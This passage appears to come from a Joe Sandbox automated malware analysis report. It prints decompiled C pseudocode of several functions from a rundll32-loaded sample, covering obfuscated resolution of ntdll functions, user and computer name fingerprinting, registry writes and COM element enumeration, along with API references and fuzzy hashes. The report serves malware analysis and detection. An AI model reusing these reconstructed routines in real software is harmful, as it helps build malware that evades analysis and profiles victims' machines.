                    Function 04214CA7 Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 04214D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 04214D17
                    • SysAllocString.OLEAUT32(00000000), ref: 04214D29
                    • SysFreeString.OLEAUT32(00000000), ref: 04214D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 04214D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 04214DA7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 32833e0163dff3bd452280df03f8be777bf93ae8212d5389129e4a638672d67f
                    • Instruction ID: 6d5ca2f7e564a450308610ad4bc30c4ea2d7ca67f7f181cea3555e321ff6a8cc
                    • Opcode Fuzzy Hash: 32833e0163dff3bd452280df03f8be777bf93ae8212d5389129e4a638672d67f
                    • Instruction Fuzzy Hash: 12313D32E10609AFDF01EFACD848A9FB7F6AF59304F144465E914EB120DB76AD06CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421624F Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0421624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E042163FD(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x421a320; // 0x87d5a8
					_t1 = _t23 + 0x421b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x421a320; // 0x87d5a8
					_t2 = _t26 + 0x421b769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E042117AB(_t54);
					} else {
						_t30 =  *0x421a320; // 0x87d5a8
						_t5 = _t30 + 0x421b756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x421a320; // 0x87d5a8
							_t7 = _t33 + 0x421b40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x421a320; // 0x87d5a8
								_t9 = _t36 + 0x421b4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x421a320; // 0x87d5a8
									_t11 = _t39 + 0x421b779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0421462B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                    0x0421625e
                    0x04216262
                    0x04216324
                    0x04216268
                    0x04216268
                    0x0421626d
                    0x04216280
                    0x04216282
                    0x04216287
                    0x0421628f
                    0x04216296
                    0x0421629a
                    0x0421629d
                    0x0421631c
                    0x0421631d
                    0x0421629f
                    0x0421629f
                    0x042162a4
                    0x042162ac
                    0x042162b0
                    0x042162b3
                    0x00000000
                    0x042162b5
                    0x042162b5
                    0x042162ba
                    0x042162c2
                    0x042162c6
                    0x042162c9
                    0x00000000
                    0x042162cb
                    0x042162cb
                    0x042162d0
                    0x042162d8
                    0x042162dc
                    0x042162df
                    0x00000000
                    0x042162e1
                    0x042162e1
                    0x042162e6
                    0x042162ee
                    0x042162f2
                    0x042162f5
                    0x00000000
                    0x042162f7
                    0x042162fd
                    0x04216302
                    0x04216309
                    0x04216310
                    0x04216313
                    0x00000000
                    0x04216315
                    0x04216318
                    0x04216318
                    0x04216313
                    0x042162f5
                    0x042162df
                    0x042162c9
                    0x042162b3
                    0x0421629d
                    0x04216332

                    APIs
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04211986,?,?,?,?,00000000,00000000), ref: 04216274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04216296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 042162AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042162C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042162D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042162EE
                      • Part of subcall function 0421462B: memset.NTDLL ref: 042146AA
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: 31aee8eadb5ed2b26e1c6c177142ac3000bdfa22776cb3c1f4faf30fc1de8ff6
                    • Instruction ID: 97baabad6421750f731a5a63fefa409d075c3e772befd1ef0d6d4d784d813b1d
                    • Opcode Fuzzy Hash: 31aee8eadb5ed2b26e1c6c177142ac3000bdfa22776cb3c1f4faf30fc1de8ff6
                    • Instruction Fuzzy Hash: 96216DB171124AAFD710DF68D888E5EBBFCEB28B54B054465E909C7220E739FD06CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04212B1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E04212B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x421a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E04215406( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04217488(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E042117AB(_a8);
						goto L29;
					}
					_t64 =  *0x421a318; // 0x4a99d58
					_t16 = _t64 + 0xc; // 0x4a99e7a
					_t65 = E04215406(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d042190
						if(E04215B98(_t97,  *_t33, _t91, _a8,  *0x421a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x421a320; // 0x87d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x421ba3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x421b8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E0421266A(_t69,  *0x421a3d4,  *0x421a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x421a320; // 0x87d5a8
									_t44 = _t71 + 0x421b846; // 0x74666f53
									_t73 = E04215406(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d042190
										E042134EE( *_t47, _t91, _a8,  *0x421a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d042190
										E042134EE( *_t49, _t91, _t99,  *0x421a3d0, _a16);
										E042117AB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d042190
									E042134EE( *_t40, _t91, _a8,  *0x421a3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d042190
									E042134EE( *_t43, _t91, _a8,  *0x421a3d0, _a16);
								}
								if( *_t101 != 0) {
									E042117AB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d042190
					_t81 = E04211BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d042190
							E04215B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E042117AB(_t100);
						_t98 = _a16;
					}
					E042117AB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04217961(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x421a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                    0x04212b1e
                    0x04212b27
                    0x04212b2e
                    0x04212b33
                    0x04212ba0
                    0x04212ba6
                    0x04212bab
                    0x04212bb2
                    0x04212bb9
                    0x04212bbc
                    0x04212d27
                    0x04212d2e
                    0x04212d2e
                    0x04212d33
                    0x04212d35
                    0x04212d35
                    0x04212d3e
                    0x04212d3e
                    0x04212bc2
                    0x04212bce
                    0x04212d1d
                    0x04212d20
                    0x00000000
                    0x04212d20
                    0x04212bd4
                    0x04212bd9
                    0x04212bdc
                    0x04212be3
                    0x04212be6
                    0x04212c2f
                    0x04212c2f
                    0x04212c42
                    0x04212c4c
                    0x04212c54
                    0x04212c59
                    0x04212c63
                    0x04212c63
                    0x04212c5b
                    0x04212c5b
                    0x04212c5b
                    0x04212c5b
                    0x04212c85
                    0x04212c8d
                    0x04212cbb
                    0x04212cc0
                    0x04212cc7
                    0x04212ccc
                    0x04212cd0
                    0x04212d02
                    0x04212cd2
                    0x04212cdf
                    0x04212ce2
                    0x04212cf2
                    0x04212cf5
                    0x04212cfb
                    0x04212cfb
                    0x04212c8f
                    0x04212c9c
                    0x04212c9f
                    0x04212cb1
                    0x04212cb4
                    0x04212cb4
                    0x04212d0c
                    0x04212d18
                    0x04212d0e
                    0x04212d11
                    0x04212d11
                    0x04212d0c
                    0x04212c85
                    0x00000000
                    0x04212c4c
                    0x04212bf5
                    0x04212bf8
                    0x04212bff
                    0x04212c05
                    0x04212c08
                    0x04212c0a
                    0x04212c16
                    0x04212c19
                    0x04212c19
                    0x04212c1f
                    0x04212c24
                    0x04212c24
                    0x04212c2a
                    0x00000000
                    0x04212c2a
                    0x04212b38
                    0x00000000
                    0x04212b5f
                    0x04212b5f
                    0x04212b6b
                    0x04212b7e
                    0x04212b84
                    0x04212b8c
                    0x00000000
                    0x04212b8c

                    APIs
                    • StrChrA.SHLWAPI(04211850,0000005F,00000000,00000000,00000104), ref: 04212B51
                    • lstrcpy.KERNEL32(?,?), ref: 04212B7E
                      • Part of subcall function 04215406: lstrlen.KERNEL32(?,00000000,04A99D58,00000000,04213C77,04A99F7B,69B25F44,?,?,?,?,69B25F44,00000005,0421A00C,4D283A53,?), ref: 0421540D
                      • Part of subcall function 04215406: mbstowcs.NTDLL ref: 04215436
                      • Part of subcall function 04215406: memset.NTDLL ref: 04215448
                      • Part of subcall function 042134EE: lstrlenW.KERNEL32(?,?,?,04212CE7,3D042190,80000002,04211850,04215F20,74666F53,4D4C4B48,04215F20,?,3D042190,80000002,04211850,?), ref: 04213513
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 04212BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: 74a738a6f4ab219cbd12597ea17e5e7276fc357e1472a5b2b507b742f42c9844
                    • Instruction ID: e0df1e2e59a3c7acc0f212a9e0610f1b613bea24452babb425387cc6ffcc3995
                    • Opcode Fuzzy Hash: 74a738a6f4ab219cbd12597ea17e5e7276fc357e1472a5b2b507b742f42c9844
                    • Instruction Fuzzy Hash: 2351507532020AEFDF229F54EC44EAA77F9EF68344F108454FA15A2170D735E955DB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04214DFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E04214DFF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x421a3cc; // 0x4a995b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x421a3cc; // 0x4a995b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x421a3cc; // 0x4a995b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x421b81a) {
					HeapFree( *0x421a2d8, 0, _t10);
					_t7 =  *0x421a3cc; // 0x4a995b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                    0x04214dff
                    0x04214e08
                    0x04214e18
                    0x04214e18
                    0x04214e1d
                    0x04214e22
                    0x00000000
                    0x00000000
                    0x04214e12
                    0x04214e12
                    0x04214e24
                    0x04214e29
                    0x04214e2d
                    0x04214e40
                    0x04214e46
                    0x04214e46
                    0x04214e4f
                    0x04214e51
                    0x04214e55
                    0x04214e5b

                    APIs
                    • RtlEnterCriticalSection.NTDLL(04A99570), ref: 04214E08
                    • Sleep.KERNEL32(0000000A), ref: 04214E12
                    • HeapFree.KERNEL32(00000000), ref: 04214E40
                    • RtlLeaveCriticalSection.NTDLL(04A99570), ref: 04214E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: edccfb42d2c8e9f6d8724dfb5efca74c2553f2a1606e9657276e0db51b0554b0
                    • Instruction ID: 777a572a26a097af8a0359911d16149b8dd1c1b56d15e59f9f163d4888a89b0b
                    • Opcode Fuzzy Hash: edccfb42d2c8e9f6d8724dfb5efca74c2553f2a1606e9657276e0db51b0554b0
                    • Instruction Fuzzy Hash: 99F0D4B47512029FEB189F58F99DB26B7F5EB74701B05801AE806D72B0CA38EC80CA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04214B71 Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04214B71() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E042163FD(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E042117AB(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                    0x04214b7f
                    0x04214b82
                    0x04214b85
                    0x04214b8b
                    0x04214b90
                    0x04214b96
                    0x04214b9e
                    0x04214ba1
                    0x04214ba7
                    0x04214bac
                    0x04214bb9
                    0x04214bc6
                    0x04214bca
                    0x04214bcc
                    0x04214bd0
                    0x04214bd3
                    0x04214be3
                    0x04214c35
                    0x04214c36
                    0x04214be5
                    0x04214be8
                    0x04214bef
                    0x04214bf2
                    0x04214c05
                    0x00000000
                    0x04214c07
                    0x04214c0a
                    0x04214c1d
                    0x04214c20
                    0x04214c28
                    0x04214c2b
                    0x00000000
                    0x04214c2d
                    0x04214c2d
                    0x04214c30
                    0x04214c30
                    0x04214c2b
                    0x04214c05
                    0x04214c3b
                    0x04214c3c
                    0x04214bac
                    0x04214c42

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04214B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 04214BA1
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04214BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 04214BFD
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 04214C20
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: d32e9560dcde735c531476797089be04fd3a6d1c0ebb09278f28be1663f5bb02
                    • Instruction ID: afef36ae9891e52a920f6181522d5cba970c63b87635e3d5929f90a044d52057
                    • Opcode Fuzzy Hash: d32e9560dcde735c531476797089be04fd3a6d1c0ebb09278f28be1663f5bb02
                    • Instruction Fuzzy Hash: 9421FBB5A10209FFCB11DFA8D9888EEBBF8EF54304B5045AAE505E7210DB34AB45DB14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04215A5A Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04215A5A(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x421a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x421a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x421a2f8 = _t6;
					 *0x421a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x421a2f4 = _t7;
					if(_t7 == 0) {
						 *0x421a2f4 =  *0x421a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                    0x04215a62
                    0x04215a6a
                    0x04215a6f
                    0x00000000
                    0x04215ac4
                    0x04215a71
                    0x04215a79
                    0x04215a81
                    0x04215a81
                    0x04215ac1
                    0x00000000
                    0x04215ac1
                    0x04215a83
                    0x04215a83
                    0x04215a88
                    0x04215a9a
                    0x04215a9f
                    0x04215aa5
                    0x04215aad
                    0x04215ab2
                    0x04215ab4
                    0x04215ab4
                    0x00000000
                    0x04215abb
                    0x04215a7d
                    0x00000000
                    0x00000000
                    0x04215a7f
                    0x00000000

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04214603,?), ref: 04215A62
                    • GetVersion.KERNEL32 ref: 04215A71
                    • GetCurrentProcessId.KERNEL32 ref: 04215A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04215AA5
                    • GetLastError.KERNEL32 ref: 04215AC4
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: efe6b0fae43ef402a8b9fca52db8e461c4e887b83cca97626a2388a5533b75d0
                    • Instruction ID: cff5bc064802ba47ce1adcf7c2fdd5d640198ec2968849cc4a43c7eb446c6fef
                    • Opcode Fuzzy Hash: efe6b0fae43ef402a8b9fca52db8e461c4e887b83cca97626a2388a5533b75d0
                    • Instruction Fuzzy Hash: 95F08CB0BA2302AFD7209F28B95DB243AA1E770B41F00445AE516C61F0EFB958C1CA15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04213D67 Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 46%
                    			E04213D67(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x421a320; // 0x87d5a8
					_t5 = _t102 + 0x421b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x4219290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x421a320; // 0x87d5a8
												_t28 = _t108 + 0x421b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x421a320; // 0x87d5a8
														_t33 = _t78 + 0x421b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                    0x04213d6c
                    0x04213d75
                    0x04213d76
                    0x04213d7a
                    0x04213d80
                    0x04213d86
                    0x04213d8f
                    0x04213d95
                    0x04213d9f
                    0x04213da1
                    0x04213da7
                    0x04213dac
                    0x04213db7
                    0x04213dbf
                    0x04213dc2
                    0x04213ee5
                    0x04213dc8
                    0x04213dc8
                    0x04213dd5
                    0x04213ddb
                    0x04213de1
                    0x04213de5
                    0x04213deb
                    0x04213df8
                    0x04213dfc
                    0x04213e02
                    0x04213e05
                    0x04213e0b
                    0x04213e11
                    0x04213e17
                    0x04213e1a
                    0x04213e1d
                    0x04213e23
                    0x04213e2c
                    0x04213e32
                    0x04213e33
                    0x04213e36
                    0x04213e37
                    0x04213e38
                    0x04213e40
                    0x04213e41
                    0x04213e42
                    0x04213e44
                    0x04213e48
                    0x04213e4c
                    0x00000000
                    0x00000000
                    0x04213e52
                    0x04213e5b
                    0x04213e61
                    0x04213e6b
                    0x04213e6f
                    0x04213e71
                    0x04213e7e
                    0x04213e82
                    0x04213e8a
                    0x04213e8f
                    0x04213ea1
                    0x04213ea3
                    0x04213ea9
                    0x04213ea9
                    0x04213eb2
                    0x04213eb2
                    0x04213eb4
                    0x04213eba
                    0x04213eba
                    0x04213ebd
                    0x04213ec3
                    0x04213ec6
                    0x04213ecf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04213ecf
                    0x04213e23
                    0x04213e1d
                    0x04213e05
                    0x04213ed5
                    0x04213ed5
                    0x04213edb
                    0x04213edb
                    0x04213ee1
                    0x04213ee1
                    0x04213eea
                    0x04213ef0
                    0x04213ef0
                    0x04213dac
                    0x04213ef9

                    APIs
